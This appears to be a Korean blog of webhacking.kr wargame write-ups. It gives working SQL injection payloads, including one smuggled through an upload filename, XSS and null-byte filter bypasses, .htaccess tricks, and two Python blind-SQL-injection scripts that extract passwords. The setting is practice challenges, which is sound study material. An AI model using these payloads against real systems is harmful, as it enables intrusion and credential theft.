늘모자란, 개발

파일 업로드 취약점은 상식이 거의 없어서 밑천이 드러나고 있다... 계속 고전중인데, 이녀석도 그렇게 될 것 같은 기분이 든다

phps를 보면,

<?
mysql_connect() or die();

mysql_select_db("challenge_30_table") or die();

$q=mysql_query("select password from challenge_30_answer") or die();

$data=mysql_fetch_array($q) or die();

if($data)
{
$pw="????";
echo("Password is $pw");
}

?>

index.phps는 일단 아무 상관이 없다. 그리고 입력하는 데이터도 없고, 얘를 성공적으로만 돌아가게 하면 그냥 성공인것 같다.

http://webhacking.kr/challenge/web/web-15/upload/index.php

로 들어가면 흰화면이 뜬다. 아마 die가 된다는 말이겠지?
접근은 간단하게 .htaccess를 겹쳐썼듯이 해보기로 한다.
내용은 완전히 똑같게 하고 , index.php를 업로드 시도했더니 정말 쿨하게 no가 돌아왔다. 경로를 upload/ 를 붙여봐도 똑같다. index란게 안되나..

indx2.php로 이름을 바꾸고 올려보니까 올라갔는데, <xmp>가 붙은것 마냥 그대로 나왔다.
어쨌든, php를 원격으로 실행도 안되고 결국은 아까처럼 htaccess를 가지고 놀아야 할 느낌이었다. 역시 좀 생각을 해봤는데 내가 안본지 오래되서 놓쳤던게 있었다.

mysql_connect()는 여기에 원래 host를 적어줘야한다. 근데 여기선 host가 없다. 즉 기본값을 따라간다는것 같은..데...
mysql 홈페이지에가서 이런걸 확인해볼 수 있었다.

resource mysql_connect(string server= =ini_get("mysql.default_host"),
                       string username= =ini_get("mysql.default_user"),
                       string password= =ini_get("mysql.default_password"),
                       bool new_link= =false,
                       int client_flags= =0);

그렇다면 어떻게 해야하느냐~ 얘를 수정해보도록 하자.
htaccess에서 PHP value를 주기 위해서는 php_value라고 명시해줘야 한다. 다음과 같은 모양이 되야한다.(도메인이 아니라 IP를 쓰자)

php_value mysql.default_host "@@@@@@@@"

php_value mysql.default_user "############"

php_value mysql.default_password "~~~~~~~"

이렇게 만들어 주면 그냥 일사천리다.
내가 의도한 DB에 접속하도록 DB와 테이블을 만들어주면 문제가 해결된다.
값은 별 상관없다.

INSERT INTO `challenge_30_table`.`challenge_30_answer` (`password`) VALUES ('1')

2016/03/31 21:43 2016/03/31 21:43

아까와 흡사한 문제인것 같다.
. 이 들어가면 없애버리니까 abc.txt 는 abctxt 같은 형태로 저장되려나 보다.
pass.word나 .htaccess를 올려보니 선택된 파일이 존재한다고만 하고, 감이 안왔다.
이번 문제는 정말 너무 불친절해서 뭘 의미하는질 모르겠다..

파일을 그냥 이것저것 올려보니까 드디어 뭔가 단서를 얻은 것 같다.

글자가 안보여서 좀 키웠다. 여튼 요런게 나온다.
그리고 똑같은 파일을 올리면 또 안나온다. (안나오는게 정상은 아닌것 같다)
한번 더 올려봤다.



이제야 뭔가 감이 잡히는 느낌이다. 결국 filename으로 password를 select 해야되는 미션으로 보인다.
요컨데 예상하기로 쿼리는

INSERT INTO c29_tb (time,ip,file) VALUES (time(),$_SERVER['REMOTE_ADDR'], $file_name)

요런 모양일 것 같다. 고로..
") 로 파일명을 조작해서 보내본다.

------WebKitFormBoundary3EKwhzwJ8VfERMhS
Content-Disposition: form-data; name="upfile"; filename="'); select 1,2,password from c29_tb"
Content-Type: image/png

------WebKitFormBoundary3EKwhzwJ8VfERMhS--

아니나 다를까 에러가 돌아온다. (upload error!)

여기서 검색을 좀 했다. 나로서는 너무 답답해서 .. 원리는 알겠는데 순서를 짜맞추고 있는게 너무 답답해서 좀 참고했다.

나름의 정리를 하자면

Content-Disposition: form-data; name="upfile"; filename="abcd.txt', (select password from c29_tb), CHAR(..............))#"

첫번째 파라미터는 filename에 들어가야할 녀석이고, 두번째는 time, 그다음은 IP이다.
이때 IP는 무조건 내 아이피가 기입되야 볼 수 있는 구조이다. 즉, IP가 다르면 보여지지 않기때문에 CHAR함수를 이용해 아이피를 hex값으로 변환해 정상동작하도록 시킨다.
그리고 원래 시간이 나와야할 곳에 서브쿼리를 작성해 password를 출력하게 하면 된다.

몇십분동안 Done은 뜨는데 보이질 않아서 정말 빡쳤었는데 결국 아이피 문제였다... 다양한 방법으로 생각을 해봤으면 좋았을것을 아쉽다

2016/03/31 21:06 2016/03/31 21:06

나는 처음에 얘를 보고 웹쉘이라고 생각했다.
그래서 php파일을 올린다음에 웹쉘처럼 쓰면 되지 않을까? 생각했다. 우선 php코드가 작동되는지 봐야했기때문에, hi.php 를 작성해서 올려봤다.


아무래도 보안 어쩌고 하는거보니 웹쉘로 공격당했나보다 정말로..
어쨌든 이 문제가 요구하는건 .htaccess를 겹쳐써서, 해당 디렉토리가 더 이상 기능을 수행할 수 없도록 하는것이 목표라고 할 수 있겠다.

그래서 빈 htaccess를 올려보고 별걸 다해봤는데 잘 안되었다.
결국 검색찬스...를 썼는데, read me 라고 출력되는게 애초에 php 코드가 출력되는거라서 이를 무력화하면 된다고 한다.

htaccess의 문법은 좀 특이한 편인데 나는 여기서 PHP를 off하는걸 확인하고 옮겼다.

RemoveHandler .php .phtml .php3
RemoveType .php .phtml .php3
php_flag engine off

업로드 하는순간 문제는 클리어된다.
요점은, htaccess 간수를 잘해야된다정도랄까? REWRITE ENGINE등으로 넘겨주고 있는 곳도 많은데 (나를 포함해), htaccess가 겹쳐지게 되면 정말 재앙이 일어날 수 있다는걸 알려주는것 같다.

2016/03/31 18:36 2016/03/31 18:36

index.phps를 보라고 주석에 되있으니 보자....

<html>
<head>
<title>Challenge 27</title>
</head>
<body>
<h1>SQL INJECTION</h1>
<form method=get action=index.php>
<input type=text name=no><input type=submit>
</form>
<?
if($_GET[no])
{

if(eregi("#|union|from|challenge|select|\(|\t|/|limit|=|0x",$_GET[no])) exit("no hack");

$q=@mysql_fetch_array(mysql_query("select id from challenge27_table where id='guest' and no=($_GET[no])")) or die("query error");

if($q[id]=="guest") echo("guest");
if($q[id]=="admin") @solve();

}

?>
<!-- index.phps -->
</body>
</html>

no라는 값을 GET으로 넘겨야되는데 골때리는게
정말 select를 위해 필요한녀석들을 다 필터링해놨다. 그렇지만 admin으로 패스해야하니 짱구를 굴려보자
사실 이 문제는 이 문제와 굉장히 닮았다. 그래서 귀찮은마음에 답을 복사해서 넣어봤더니... ㅎㅎ 당연히 안된다.

원리는 똑같다. 앞선 데이터를 무효화하고 admin으로 로그인하면된다.
우선 admin의 row를 알아야내야하는데, 0은 반응없고 1일때는 true, 2일때는 query error가 난다. 2가 admin인가보다.
no=의 값이 괄호 처리 되어 있기때문에 괄호부터 깨준다.

-1) 를 넣어주고(1만 아니면 뭐든 상관없다)
그다음에 우리가 원하는 2를 넣어준다. 근데 no=2를 하고 싶지만 =가 필터링되고 있다.
그래서 잘 써먹던 in을 적어줘봤다. -1) or no in(2) 그치만 내가 못읽은... '(' 가 필터링 되고 있다
그래서 like를 써보기로 하고, 주석처리를 해준다.

mysql은 #과 -- 를 주석으로 쓸 수 있다.
고로 대강 쿼리를 만들어보면

0) or no like 2 -- 

요런 모양이 된다.

2016/03/31 16:02 2016/03/31 16:02

이제 문제 생김새에 입대기도 지친다.

<html> 
<head> 
<title>Challenge 26</title> 
<style type="text/css"> 
body { background:black; color:white; font-size:10pt; }     
a { color:lightgreen; } 
</style> 
</head> 
<body> 

<? 

if(eregi("admin",$_GET[id])) { echo("<p>no!"); exit(); } 

$_GET[id]=urldecode($_GET[id]); 

if($_GET[id]=="admin") 
{ 
@solve(26,100); 
} 

?> 


<br><br> 
<a href=index.phps>index.phps</a> 
</body> 
</html> 

정규식 필터링인데, get ID중에 admin을 필터링하고 있다. 근데 solve하려면 admin을 넣어야된다고 한다.
사실 이건 문제같지도 않은게, eregi 밑에 urldecode를 하고 있다. 뭐하라는건진 잘 모르겠는데 urlencode해주면된다.
근데 바로 안된다. 좀 고민을 하다가 두번 인코드하면 어떨까 해서 했더니 된다.

사실 double encode는 알고 있었는데 바로바로 생각이 안나는거보니 멀었다...
이 기법은 유명한 기법인데, OWASP의 XSS Filter Evasion 문서를 참고 하면 도움이 될 것 같다.

2016/03/31 15:41 2016/03/31 15:41

이 문제는 불러오는 녀석의 취약점인데 많은 사이트들이 취하고 있는 다운로드 방법이라 할 수 있다.
일단 요 문제는 생긴게 아니라 URL을 봐야한다.

http://webhacking.kr/challenge/bonus/bonus-5/?file=hello

파일이 어디 저장되어있는지 감추고 싶을때, 요컨데 이런식으로 사용하는 것이다

(절대경로) (입력받은 파일의 이름) (절대확장자(fixed))
고로 이 경우엔 무조건 hello.txt라는 파일을 읽도록 디자인 되어 있음이 틀림없다. 고로 .txt 부분부터 무력화 하면 될것이다
보통은 이런 경우 공격을 위해 null을 사용한다.

이름.php\0.txt 꼴이 되게 하는건데 이런경우 txt까지 읽지 않고 앞의 확장자까지만 읽게 된다.
고로 요렇게 만들어줘서 리퀘스트를 해준다. null은 urlencode hardware 에서 검색해서 넣으면된다.

그럼 비밀번호가 나온다. Auth 해주고 점수를 챙기자. 절대 경로로 사용하는 요 방법은 상위 directory traversal 과 같은 공격으로 이어지기도 하니까, 필터링을 잘해야한다. 애초에 쓸데없는 null이나, ../ 이런건 필터링 해버려야한다

2016/03/31 15:29 2016/03/31 15:29

<?

extract($_SERVER);
extract($_COOKIE);

if(!$REMOTE_ADDR) $REMOTE_ADDR=$_SERVER[REMOTE_ADDR];

$ip=$REMOTE_ADDR;
$agent=$HTTP_USER_AGENT;


if($_COOKIE[REMOTE_ADDR])
{
$ip=str_replace("12","",$ip);
$ip=str_replace("7.","",$ip);
$ip=str_replace("0.","",$ip);
}

echo("<table border=1><tr><td>client ip</td><td>$ip</td></tr><tr><td>agent</td><td>$agent</td></tr></table>");

if($ip=="127.0.0.1")
{
@solve();
}

else
{
echo("<p><hr><center>Wrong IP!</center><hr>");
}
?>

2016/03/31 15:17 2016/03/31 15:17

JS challenge인것 같다.
스크립트를 끼워넣는건 XSS의 기본이므로 고심해보기로 하자
당연한 말이지만 그대로 넣으면 안된다. no hack이 우리를 반겨준다.

문제는 뭘 의미하는지 뻔하다. 브라우저의 똑똑함을 이용하는 것이다. 브라우저라는 놈은 원체 똑똑하면서 멍청해서, <scrip+t> 이런것도 그냥 script로 인식해서 돌려준다. 따라서 필터링 되있다면 그사이에 쓸데없는 단어를 끼워넣어 패스해볼것이다. 요컨데 이런 모양이다

<s c r i p t > alert(1);</ s c r i p t >

혹시 하는 마음에 <scri+pt> 로 해도 안된다. 뭐가 막혔을까? 전부 개행시켜줘봐도 안된다. 이정도 되면 공백이 필터링 됐다고 봐야한다.
그치만 우리는 urlencode hardware 로 뭔가 뛰어넘어본 사람들이다. 안쓰던걸 막 넣어서 돌려보자

<%00s%00c%00r%00i%00p%00t%00>alert(1);</%00s%00c%00r%00i%00p%00t%00>

대략 이런 느낌으로 만들어준다. alert도 땡기면 막 넣어준다.
뭐가 됐는진 모르겠는데 이미 패스했단다. 허무하다... 디버거툴을 쓰면 이런일이 발생한다....... 하여튼 패스.....

2016/03/31 15:01 2016/03/31 15:01

22번 문제는 500점쯤 되는 꽤 높은 점수의 문제이다.
일단 문제 모양을 보니 전에 난독화를 풀고 admin으로 회원가입하는 문제가 생각난다. 어쨌든 $id에 admin을 우겨넣어야겠다.

다만 요번엔 소스에 별 특이사항이 없다.

<html>
<head>
<title>Challenge 22</title>
<style type="text/css">
body { background:black; color:white; font-size:10pt; }
table { background:black; color:white; font-size:9pt; }
input { background:silver; color:black; font-size:9pt; }
a { color:lightgreen; }
</style>
</head>
<body>




<form method=post action=index.php>
<table border=1 cellpadding=5 cellspacing=0>
<tr><td>username</td><td><input name=id type=text></td></tr>
<tr><td>password</td><td><input name=pw type=password></td></tr>
<tr align=center><td><input type=submit value='login'></td><td><input type=button value='join' onclick=location.href='?mode=join' style=width:100;></td></tr>
</form>

<p>

</table><br><br>
<pre>
<a style=background:silver;color:red;width:400;><b>HINT</b></a>
<a style=background:white;color:black;width:400;>
echo("hi! $id");
echo("your password is $pw");

if($id=="admin") echo("good! Password is $solution");
</a>
</pre>

</body>
</html>

메인도 평범하고,

<html>
<head>
<title>Challenge 22</title>
<style type="text/css">
body { background:black; color:white; font-size:10pt; }
table { background:black; color:white; font-size:9pt; }
input { background:silver; color:black; font-size:9pt; }
a { color:lightgreen; }
</style>
</head>
<body>


<form method=post action=index.php?mode=join>
<table border=1>
<tr><td>username</td><td><input name=id type=text></td></tr>
<tr><td>password</td><td><input name=pw type=password></td></tr>
<tr><td align=center colspan=2><input type=submit value='join'></td></tr>
</form>

회원가입도 평범하다. 이제 비집고 들어가보기 위해 이것저것 쳐보자.
'admin '으로 가입하니까 이미 있다고 나오길래, admi+n 으로 가입했는데 그냥 가입이 된다. 본문에서 공백을 따로 제거하지 않는 모양이다.
바로 될린 없으니 아쉽진않고, 공백을 쳐넣은다음에 로그인을 해보니 뭔가 만들어진다.



유저 키가 만들어졌다는데, md5인것 같다.
크랙해보기로 한다. 크랙은 여러번 나왔지만 여기서 하면 된다.
비밀번호를 1로 했는데, 1zombie 라는 값이라고 한다. zombie가 salt처럼 붙고, md5 처리되는걸로 생각할 수 있다.
근데 이걸로 딱히 뭘 할수는 없는것 같다. 이걸 일단 알고만 있자.

그림에선 your password 어쩌고 이렇게 나왔지만 결국 user key가 md5화되어 pw란에 저장되고 있다는것을 guess할 수 있다.
우리는 admin을 공략해야하니까 blind sql injection을 해야한다. id란에는 union이 no hack으로 필터되고 있기 때문에 여태 해왔던 방법처럼 한자리씩 대조해보자

우선 쿼리문은 이렇게 쓴다. 조금 다른점이 있다면 여지껏 뒷 문장을 주석처리 한적은 없으나 요번엔 내가 원하는데로 쿼리문을 잘라야하기때문에, 주석을 붙여서 뒷라인을 무력화해아한다. 주석은 --나, //, # 등이 있는데 일반적으로 #이 많이 쓰이는듯하다.

admin' and 1=1 #

위와같이 id에 값을 실어보내면 Wrong!이 아니라 Wrong password!가 뜬다. 이제 시작해보면 되겠지?
다만 이번 경우는 form값이 POST이기때문에 조금 다르게 해준다. 이번엔 ascii도 필터링되지 않아 hex로 변환도 필요없이 깔끔하게 구문을 만들 수 있다.

#!/usr/bin/env python
# -*- coding: utf8 -*-
 
import urllib, urllib2, re
 
sess = ""

headers = {'Host': 'webhacking.kr',
           'Cookie': "PHPSESSID={}".format(sess)
          }
pw = ''
for i in range(1,33):
    for j in range(48,123):
        url = 'http://webhacking.kr/challenge/bonus/bonus-2/index.php'
        data = "id=admin' and ascii(substr(pw,{},1))={}#".format(i,j)

        req = urllib2.Request(url, data, headers)
        response = urllib2.urlopen(req).read()

        if ("Wrong password!" in response):
            pw = pw + chr(j)
            break

print pw

좀 안타까운일이라면 여기엔 대문자가 없음에도 대문자를 검사해야한다. 아스키코드상으로 우선이기때문에.. 이건 처리하려면 처리할 수 있는 부분이지만 나는 그냥 돌렸다. 32자리의 md5 hash값을 얻으면 이곳에서 decrypt해보면 된다.
다만 아까 얻은 값에 zombie가 붙어있는데 우린 이 값이 salt임을 안다. 제거하면 비밀번호를 얻을 수 있다.

타이핑 해주면 패스..

---

이 문제는 사실 어떻게 보면 굉장히 민감한 내용이다.
패스워드 자리수를 추측하지 못하게 hash화 하는것은 굉장히 좋은 방법이며, salt를 추가한것도 아주 권장되는 방법이다.

다만, md5 와 sha1은 이미 cracking되어 문제풀이와 같이 아주 쉽게 박살낼 수 있다.
최근 문제가 된 뽐뿌의 경우도 md5로 패스워드를 보관했다하니 그냥 절단났다고 할 수 있다.
hash화 했다고 안심하지 말자!

2016/03/31 14:41 2016/03/31 14:41

이름부터 blind sql injection이라고 대문만하게 쓰여있다. 안그래도 잘 보여..

값을 0,1,2,3... 순서대로 넣어봤다. 문제 풀이와는 상관없고 그냥 넣어봤다.
0- No result
1- True
2- True
3~ False

왜 1과 2는 True인데 3부터는 false인가? 무엇이란말이지..
URL을보니까 no, id, pw를 받고 있긴했다. 소스상에도 hidden값으로 id, pw가 들어가 있긴했는데 인자는 no밖에 없고..
어쨌든 no가 T/F를 주니까 이녀석으로 알아내보도록 하자.

처음엔 길이를 알아내보자.

1 and length(id)={}
2 and length(id)={}

를 no의 파라미터에 준다. {} 는 숫자를... 값이 5일때 True가 나온다. 3부터는 뭘해도 False가 나온다.
즉, 앞서 1,2는 존재하는 row번호였다. 너무 찍어맞춘 기분이 있지만 -_- 문제는 문제일뿐이니까...?

다음으로 pw 길이로 알아보자

1 and length(pw)={}
2 and length(pw)={}

1일경우 5
2일경우 19

정답은 안봐도 2겠지만 역시 두개 다 해보기로 한다.

여지껏 많이 해왔던 한자리식 끊어서 보내기를 할 차례가 왔다
코드를 짜보자. 이제는 익숙해질것만 같은 똑같은 코드...

#!/usr/bin/env python
# -*- coding: utf8 -*-
 
import urllib, urllib2, re
 
sess = ""

headers = {'Host': 'webhacking.kr',
           'Cookie': "PHPSESSID={}".format(sess)
          }
pw = ''
for i in range(1,21):
    for j in range(32,123):
        url = 'http://webhacking.kr/challenge/bonus/bonus-1/index.php?no=1+and+substr(pw,{},1)in({})&id=&pw='.format(i,hex(j))
        print url

        req = urllib2.Request(url, '', headers)
        response = urllib2.urlopen(req).read()
        #print response

        if ("True" in response):
            pw = pw + chr(j)
            print chr(j)
            break
print pw

id부터 알아내는 과정을 거치면 되는데 이건 어련히 잘하리라 생각한다.

1번은 guest 아이디, 2번은 admin 아이디이다.
모두가 궁금할지도 모르겠지만 1번 row는 guest/guest니까 해보지 말고 그냥 19자리 풀길바란다.
auth에 19자리를 넣어주면 클리어!

2016/03/29 13:18 2016/03/29 13:18